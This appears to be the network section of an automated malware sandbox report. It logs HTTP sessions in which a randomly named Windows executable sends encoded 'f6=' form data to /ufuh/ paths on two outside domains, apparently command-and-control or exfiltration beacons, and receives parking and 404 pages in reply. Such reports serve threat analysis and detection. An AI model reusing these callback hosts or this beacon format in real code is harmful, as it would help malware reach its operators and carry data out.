                                                                                        Data Ascii: f6=S8onh96WtuR/E2qb2eLSGtZGxWnKI3xhHwA2KNEgeg4YITCVWEyzuL9Guw7iTnwVr/xYklmTobgnKYpQWaWg9vWcOQhW8ZgUsORrXi998+VpcxcnMOqRb21A1AizZiOSC50RDTWAgmDkFI9vXL9PV/AyMdWc0uBd/JPp2GVukbCk2hogum3pQBLbMfCFbkwLO6iKoFJSped7JrsXgLlaWMmGfSN+L6zcx7X395UkFS+iAOmDXb3kf0bVq2QIYnWKvtWHEHvQ9sCRwxfhjKMlzoHZGufx9PXR6xqD9VorQCM5Rx1qMssOaQnCkgcKpCosiiTiDi3vZCOp9A0mfyqWuXqeMyuOHd9aFLQYFq0ZfNiPhZDVabL9o1k6Sy4RShe0aOqWYNsXIAxVsVJ5jQidcIww9K0uYI6nbr/QRXFRS31On9a59ERp4xDBfnW5gLHSkkVz8k6UFeBhpo/6tHzlv8bHTaZ6kkXFcRnzyjcYQS2Cq1EUBPx7VFgqjnmVNt7PvOgxauqQE/soFQFT0MZmiqZJcj099bXK+sLyEvRARbHnaaiUfbcSQiIaP1mX/HBcdnCGC9T3oeJaEs/jcmMtoSf9EzzB2SB7WDglbG3h6CLw5LuCZSjW4reiuLGCWBtoS3AnjH6AwrfOWU/KUa7Zmj2cq8W1kNxYzfY2iQPpeM1nrID4kpI1308/+PsBOdXzMxpELOmttmxNfjMKcCzjjdrDadQLX38yoIEtGjflKN9tEzATE77AEHs7qP6ae9iiB3pcfwCR61tQmgQopch+VrVNvIn9PYmqhEfnXu/sFRW1/+77qiJee3kzUDAPhKbgvHdQ/Rhhddt+uNnsu9oUnjXkPup5K360RZSaZB8NDf6nt6/ZbWeY7W9VfgJwZgBjqAcghjg1eVl3Lq6pKt01tAqz9qmJsFU0dn6bA/F1IccVFUvMrFH/JX/rhMzkHCFbfyFpS0t7jqoWNPf90AsRDau0G8eF2y09/0DEUTmO7LFsMHhg7 [TRUNCATED]
                                                                                        May 14, 2024 09:37:27.793535948 CEST121OUTData Raw: 65 48 33 73 42 47 31 55 39 6d 6d 43 72 66 56 48 38 58 31 43 2f 73 38 67 6a 2b 51 73 47 77 67 5a 45 6c 33 66 62 38 6d 30 4e 2f 6a 75 71 54 57 61 68 51 5a 62 58 42 6e 64 71 38 69 65 79 6a 79 44 73 4c 77 49 76 48 7a 53 6a 6f 34 47 45 57 61 4e 6e 75
                                                                                        Data Ascii: eH3sBG1U9mmCrfVH8X1C/s8gj+QsGwgZEl3fb8m0N/juqTWahQZbXBndq8ieyjyDsLwIvHzSjo4GEWaNnuAMYT5u/+8D2+iFDsJjxbQPzacdjoBe2/GB+GLqf


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.224916754.38.220.85802824C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        May 14, 2024 09:37:30.731595039 CEST738OUTPOST /ufuh/ HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Length: 199
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: www.kinkynerdspro.blog
                                                                                        Origin: http://www.kinkynerdspro.blog
                                                                                        Referer: http://www.kinkynerdspro.blog/ufuh/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                        Data Raw: 66 36 3d 53 38 6f 6e 68 39 36 57 74 75 52 2f 45 31 53 62 33 4b 66 53 41 39 5a 47 6c 32 6e 4b 47 58 78 6e 48 33 49 2b 4b 49 39 39 65 52 77 59 49 6d 2b 56 57 32 61 7a 2b 62 39 46 6b 51 37 63 65 48 78 66 72 2f 77 4a 6b 6e 79 54 6f 62 30 6e 46 62 42 51 48 4c 57 6a 69 76 57 65 46 77 68 62 38 5a 73 6e 73 4f 74 37 58 6a 46 39 38 39 42 70 66 31 41 6e 4a 74 43 52 4c 32 31 5a 2b 67 69 6b 5a 69 79 39 43 35 6b 6a 44 53 61 41 67 58 50 6b 46 64 78 76 51 63 4a 50 63 66 41 7a 57 74 58 6f 31 74 6b 6d 36 70 58 31 71 31 30 4c 6c 4b 57 68 39 7a 45 32 73 77 50 59 47 6a 6a 4c 56 4c 57 4c 64 57 31 6e 59 41 3d 3d
                                                                                        Data Ascii: f6=S8onh96WtuR/E1Sb3KfSA9ZGl2nKGXxnH3I+KI99eRwYIm+VW2az+b9FkQ7ceHxfr/wJknyTob0nFbBQHLWjivWeFwhb8ZsnsOt7XjF989Bpf1AnJtCRL21Z+gikZiy9C5kjDSaAgXPkFdxvQcJPcfAzWtXo1tkm6pX1q10LlKWh9zE2swPYGjjLVLWLdW1nYA==


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.224916854.38.220.85802824C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        May 14, 2024 09:37:37.084386110 CEST2578OUTPOST /ufuh/ HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Length: 3623
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: www.kinkynerdspro.blog
                                                                                        Origin: http://www.kinkynerdspro.blog
                                                                                        Referer: http://www.kinkynerdspro.blog/ufuh/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                        Data Raw: 66 36 3d 53 38 6f 6e 68 39 36 57 74 75 52 2f 46 57 61 62 79 72 66 53 58 74 5a 48 38 32 6e 4b 49 33 78 6a 48 77 41 2b 4b 4e 45 67 65 6c 55 59 49 56 57 56 52 55 79 7a 74 4c 39 46 69 51 37 69 54 6e 77 55 72 2f 55 46 6b 6c 61 70 6f 59 59 6e 4b 63 46 51 57 64 4b 67 74 2f 57 63 42 77 68 55 38 5a 73 79 73 4f 64 33 58 6a 42 45 38 39 5a 70 66 6e 59 6e 50 64 43 4f 56 6d 31 5a 2b 67 69 6f 5a 69 7a 75 43 35 38 37 44 57 58 48 67 68 4c 6b 47 34 39 76 41 4c 39 4d 58 2f 42 34 49 64 57 6f 30 75 39 73 2f 4a 50 58 32 47 77 46 6b 62 4f 6b 33 30 38 67 75 68 72 71 4d 68 4c 55 53 66 43 46 56 45 77 4a 4f 36 6a 56 6f 46 4a 53 70 65 4a 37 47 62 73 58 67 4b 6c 64 56 38 6d 47 44 43 4e 6e 50 36 75 6c 78 37 53 55 39 34 6c 54 47 68 53 69 42 4d 4f 44 47 62 33 6b 4f 30 61 65 71 32 51 2f 44 33 57 67 76 70 37 34 45 48 66 36 39 73 43 52 77 33 4c 68 31 2f 34 6c 36 59 48 5a 4f 4f 66 79 76 50 58 53 36 78 75 78 39 56 4d 72 51 47 59 35 51 42 46 71 64 4f 30 42 56 41 6e 42 67 67 63 49 74 43 70 32 69 6a 2f 45 44 69 2f 4a 5a 42 47 70 39 43 63 [TRUNCATED]
                                                                                        Data Ascii: f6=S8onh96WtuR/FWabyrfSXtZH82nKI3xjHwA+KNEgelUYIVWVRUyztL9FiQ7iTnwUr/UFklapoYYnKcFQWdKgt/WcBwhU8ZsysOd3XjBE89ZpfnYnPdCOVm1Z+gioZizuC587DWXHghLkG49vAL9MX/B4IdWo0u9s/JPX2GwFkbOk308guhrqMhLUSfCFVEwJO6jVoFJSpeJ7GbsXgKldV8mGDCNnP6ulx7SU94lTGhSiBMODGb3kO0aeq2Q/D3Wgvp74EHf69sCRw3Lh1/4l6YHZOOfyvPXS6xux9VMrQGY5QBFqdO0BVAnBggcItCp2ij/EDi/JZBGp9CcmdTqWuHqZYiuKN4leFLIHFqxkfOmPgLrVOIz601lQVy4bERfLaNGoYMgXJx5VtR95oH+eUYw35K0DD46zbrrYRX5BSCJOnNa58iNukxCJSHWv67GVkkVN8mjhFMRhprX6uVrlv8bEWaZgqEb3cRr/yg4IQUSCrmcUBMp7OVgq5XmSU977vOFKauztEPIoAGhT2OxmrqZPRD08y7XX+sbyErQLRbvnUfaUe4ESfCIeDVmE/HB6dnOCC9DNocdaEt/jUHMtlyf4GzzFySANWDp4bGKM6Gfw5veCfjjWiLeggbGCYhtwSztajF/3wp/OXlvKca7e5D2bo8W219wBzfI2iQTpePln3pD4yII1+k89wvsHbtbTMxY9LLK9tgBNf3gKVgrkvNqpMtQRdX8OoIEpGh/TK4JtEHUTI/PDGns89f6NQdjdB356fyeB7CdQmggopPJ+VbVNvIn+PYmuhEDZXvPGFRW1/v77qQReVXk6WDAflKbEvHRi/QJPdZd+h5zsu9oXqzXnV+p+K3GtRZS4ZBgNDN2nsvjZawiY829VPAJxMwBuqAd9hmRyeXd3KbapJrIqhQqw/qmf+FYRdnm5A+N1IvIVEEDMq1H/DX/o48zxIiZHfyJDS19rjfMWL8n92BsQPKu1bMeb2y4e/07MUTfs7MRsMnhg5 [TRUNCATED]
                                                                                        May 14, 2024 09:37:37.397018909 CEST1585OUTData Raw: 64 44 33 74 49 42 31 55 77 6d 6d 44 4d 66 56 65 31 58 30 2b 76 73 39 34 6a 2b 53 45 47 77 51 5a 4c 6f 58 66 5a 37 6d 31 4d 2f 6a 69 44 54 57 53 4c 51 5a 4c 58 42 6c 5a 71 2f 47 36 79 67 79 44 73 45 51 49 75 4f 54 53 41 6e 59 43 4c 57 61 6f 6c 70
                                                                                        Data Ascii: dD3tIB1UwmmDMfVe1X0+vs94j+SEGwQZLoXfZ7m1M/jiDTWSLQZLXBlZq/G6ygyDsEQIuOTSAnYCLWaolpBQ9dO2k7/rNnQJFsb/BRRGaS+1aqneugHdsL/+X6roOHZfQBQOfvg5W1/KrMuKUmkFVZs53fDxD4eWycKI25Kuau/K6SHlE7TRMJTuTkk0eBG9wZphp0w1gtp/taPGko2FIT4U3zrYKjyzCquSxyQW3V587V3kGrR


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.224916954.38.220.85802824C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        May 14, 2024 09:37:39.935286045 CEST466OUTGET /ufuh/?f6=f+AHiK2Co9o+PjKa95eLWuYGzAnlJ1JKF0U6Lu5lfhAIXWifWEmzyo1tk2ryUUFbnpUI1yrkhJgLANJ0QoKTotmHPxBrzP8E8/tDVQZOz/lyKkl1Bs+TKl0SxUzf&kjBDU=ZblXcjBhG HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Connection: close
                                                                                        Host: www.kinkynerdspro.blog
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                        May 14, 2024 09:37:40.249231100 CEST739INHTTP/1.1 404 Not Found
                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                        Date: Tue, 14 May 2024 07:37:40 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 580
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.2249170194.9.94.86802824C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        May 14, 2024 09:37:45.896930933 CEST2578OUTPOST /ufuh/ HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Length: 2159
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: www.xn--matfrmn-jxa4m.se
                                                                                        Origin: http://www.xn--matfrmn-jxa4m.se
                                                                                        Referer: http://www.xn--matfrmn-jxa4m.se/ufuh/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                        Data Raw: 66 36 3d 45 41 4e 63 46 47 39 32 58 46 4e 61 36 68 55 31 66 55 47 32 30 7a 71 78 71 52 4b 78 76 49 64 53 63 66 73 76 68 48 54 49 4f 46 66 77 69 77 67 37 47 6e 4f 59 62 7a 42 6a 50 62 74 73 5a 62 48 61 58 4b 35 4d 76 74 69 6d 67 4f 65 64 43 70 68 79 7a 42 54 5a 6a 5a 68 64 57 63 62 70 6a 64 59 7a 44 56 63 6f 68 72 77 35 6d 5a 37 59 49 58 67 69 67 4b 4c 2b 55 50 6f 37 47 46 37 7a 67 75 52 36 62 44 64 73 59 64 71 65 79 54 38 45 66 6f 73 61 54 68 6a 65 4c 45 38 31 78 46 78 59 4e 79 78 7a 63 79 68 69 7a 5a 77 31 4a 6c 6b 6a 53 32 78 70 49 6e 76 47 68 48 2f 37 55 57 42 2f 63 33 6b 74 39 7a 67 38 2f 6e 71 73 42 75 56 78 63 66 41 35 58 6d 55 6c 71 31 45 61 56 4d 69 6a 47 2b 54 38 55 43 6f 39 71 4a 5a 64 51 30 5a 57 72 71 6f 41 34 73 2f 31 32 4f 59 62 63 73 6d 48 70 4d 4f 4e 5a 37 54 72 5a 52 67 57 65 45 69 37 71 6a 79 48 77 61 43 2b 6e 7a 70 51 47 57 77 6d 6d 51 67 4b 64 4c 6e 45 4e 4e 6b 32 57 44 70 62 35 67 63 59 6c 4a 76 50 75 38 66 36 44 41 31 59 38 36 7a 31 61 37 68 72 57 4b 65 61 71 4b 52 42 2f 67 67 [TRUNCATED]
                                                                                        Data Ascii: f6=EANcFG92XFNa6hU1fUG20zqxqRKxvIdScfsvhHTIOFfwiwg7GnOYbzBjPbtsZbHaXK5MvtimgOedCphyzBTZjZhdWcbpjdYzDVcohrw5mZ7YIXgigKL+UPo7GF7zguR6bDdsYdqeyT8EfosaThjeLE81xFxYNyxzcyhizZw1JlkjS2xpInvGhH/7UWB/c3kt9zg8/nqsBuVxcfA5XmUlq1EaVMijG+T8UCo9qJZdQ0ZWrqoA4s/12OYbcsmHpMONZ7TrZRgWeEi7qjyHwaC+nzpQGWwmmQgKdLnENNk2WDpb5gcYlJvPu8f6DA1Y86z1a7hrWKeaqKRB/ggH1ngkjbmnacjHcRIdhoMMJ9UcsuxAkv+1nlgkVq/iIxTlrj7CSiqxS/Tx1Y2guXjKMaun/W6pMiK9Kh5M6vQ3UDSvifYcVffwjKSM5ViWcnzSdhdipgYGyHG0e1TmQnoRqSDmBMiu/AWbPBAUgN4U5jirDKxvvKp9AJabH8khUGfENgciKOOrn0XgjqGuYv6MHbTrGahZkApWLnj/ZP3cYqGWzPhd3a0ZdBgLWq+JqEdiDzF8MiQ7h/WUGEDuL1gbin2R4lZIowjzjLZZ0x7ZpHL3eTF2eA2fH0MDJ8VrzWRsFT1yWRiMPBl6LS3apgWnsMCMQy9FraggbGR22n/CpjX973vD+rP7hIZ9TlCBD65reY8V+PQ3unF5T7qgxDZXCsGrAyrEyiS3ddcEIbSIGsc5OZwRCG4OlMsJQeGF6C6P1MJrO9ki+bsePp1mLBAi5NErumAtiGO9LLltjhsfBkrwCUgRWr0hdf+3hBNQVKjRmNoPPcHClfzZt1XLtQGGubui4sATmXJSoSCn7G5sRRLnALr4PQ51av2S0+OwLzlIfVckj+xIIgTYzcSBYaKP+RBfp5LMeN9kJT89CH7/lnZN1srKOisczcmPebg8P9e8etgq6gjPlQuCkJBK16uT9ZaCGdZ68umA/dNVi3YxpG9qdhh0TwpiO [TRUNCATED]
                                                                                        May 14, 2024 09:37:46.204571009 CEST127OUTData Raw: 48 4d 36 58 62 6b 62 6f 61 68 33 63 64 6b 59 58 71 72 74 58 64 58 47 62 2f 76 48 75 57 37 77 70 43 50 47 73 47 57 49 73 63 30 64 49 69 74 69 75 50 37 62 70 65 58 51 55 71 44 78 73 4b 6a 50 74 4f 36 50 41 6f 57 52 55 49 42 6b 51 4e 62 34 4a 42 56
                                                                                        Data Ascii: HM6Xbkboah3cdkYXqrtXdXGb/vHuW7wpCPGsGWIsc0dIitiuP7bpeXQUqDxsKjPtO6PAoWRUIBkQNb4JBVEDY5fEQ26StEYEURAmR4OcYKx4E1KcPf1HxzBwK9Cea31
                                                                                        May 14, 2024 09:37:46.511396885 CEST1289INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Tue, 14 May 2024 07:37:46 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        X-Powered-By: PHP/8.1.24
                                                                                        Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 73 29 5b 30 5d 2c 0a 6a [TRUNCATED]
                                                                                        Data Ascii: 15f9<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head>... Google Tag Manager --><script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);})(window,document,'script','dataLayer','GTM-NP3MFSK');</script>... End Google Tag Manager --> <meta http-equiv="X-UA-Compatible" content="IE=EDGE" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="loopia-test" content="XsdXAIxha8q9Xjamck4H" /><title>Parked at Loopia</title> <link rel="apple-touch-icon" media="screen and (resolution: 163dpi)" href="https://static.loopia.se/responsive/images/iOS-57.png" /> <link rel="apple-touch-icon" media="screen and (resolution [TRUNCATED]
                                                                                        May 14, 2024 09:37:46.511420012 CEST1289INData Raw: 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 20 61 6e 64 20 28 72 65 73 6f 6c 75 74 69 6f 6e 3a 20 33 32 36 64 70 69 29 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 61 74 69 63 2e 6c 6f 6f 70 69 61
                                                                                        Data Ascii: le-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet
                                                                                        May 14, 2024 09:37:46.511434078 CEST1289INData Raw: 20 74 6f 20 76 69 65 77 20 74 68 65 20 64 6f 6d 61 69 6e 20 68 6f 6c 64 65 72 27 73 20 70 75 62 6c 69 63 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 41 72 65 20 79 6f 75 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68
                                                                                        Data Ascii: to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_con
                                                                                        May 14, 2024 09:37:46.511446953 CEST1289INData Raw: 6c 20 63 6f 6e 74 72 6f 6c 20 6f 66 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 77 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 3c 2f 68 33 3e 0a 09 09 09 3c 70 3e 57 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62
                                                                                        Data Ascii: l control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingwe
                                                                                        May 14, 2024 09:37:46.511464119 CEST661INData Raw: 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72
                                                                                        Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop
                                                                                        May 14, 2024 09:37:46.511482954 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        7192.168.2.2249171194.9.94.86802824C:\Program Files (x86)\UUpnHcChXIDkzbygjdbehNdzmCIPuPQdurhlDwPSMMJhThyxnJSFmATetlDKAyDBFnBOiEICTqwH\gpgLFpElQuxhEi.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        May 14, 2024 09:37:48.728687048 CEST744OUTPOST /ufuh/ HTTP/1.1
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Content-Length: 199
                                                                                        Cache-Control: no-cache
                                                                                        Connection: close
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: www.xn--matfrmn-jxa4m.se
                                                                                        Origin: http://www.xn--matfrmn-jxa4m.se
                                                                                        Referer: http://www.xn--matfrmn-jxa4m.se/ufuh/
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                                                                        Data Raw: 66 36 3d 45 41 4e 63 46 47 39 32 58 46 4e 61 36 69 73 31 51 6c 47 32 31 54 71 78 36 42 4b 78 6d 6f 64 55 63 66 67 6e 68 44 72 59 4f 32 50 77 69 42 51 37 47 56 57 59 63 7a 42 6b 41 37 74 77 58 37 47 65 58 4b 34 6e 76 73 4f 6d 67 4f 61 64 43 4c 4a 79 31 44 37 47 37 35 68 66 51 63 62 73 6a 64 63 59 44 56 51 65 68 71 59 35 6d 66 62 59 4c 55 59 69 78 59 6a 2b 65 66 6f 48 41 46 37 6b 67 75 4e 56 62 44 4e 30 59 65 75 65 79 6d 41 45 66 5a 4d 61 52 47 33 65 45 6b 38 30 72 31 77 4a 4d 58 55 65 62 79 4a 75 36 36 67 67 47 6d 4a 4f 51 56 5a 71 4f 6e 54 4f 6a 46 36 57 55 44 77 76 61 55 4a 7a 6e 51 3d 3d
                                                                                        Data Ascii: f6=EANcFG92XFNa6is1QlG21Tqx6BKxmodUcfgnhDrYO2PwiBQ7GVWYczBkA7twX7GeXK4nvsOmgOadCLJy1D7G75hfQcbsjdcYDVQehqY5mfbYLUYixYj+efoHAF7kguNVbDN0YeueymAEfZMaRG3eEk80r1wJMXUebyJu66ggGmJOQVZqOnTOjF6WUDwvaUJznQ==
                                                                                        May 14, 2024 09:37:49.033893108 CEST1289INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Tue, 14 May 2024 07:37:48 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        X-Powered-By: PHP/8.1.24
                                                                                        Data Raw: 31 35 66 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 77 2c 64 2c 73 2c 6c 2c 69 29 7b 77 5b 6c 5d 3d 77 5b 6c 5d 7c 7c 5b 5d 3b 77 5b 6c 5d 2e 70 75 73 68 28 7b 27 67 74 6d 2e 73 74 61 72 74 27 3a 0a 6e 65 77 20 44 61 74 65 28 29 2e 67 65 74 54 69 6d 65 28 29 2c 65 76 65 6e 74 3a 27 67 74 6d 2e 6a 73 27 7d 29 3b 76 61 72 20 66 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 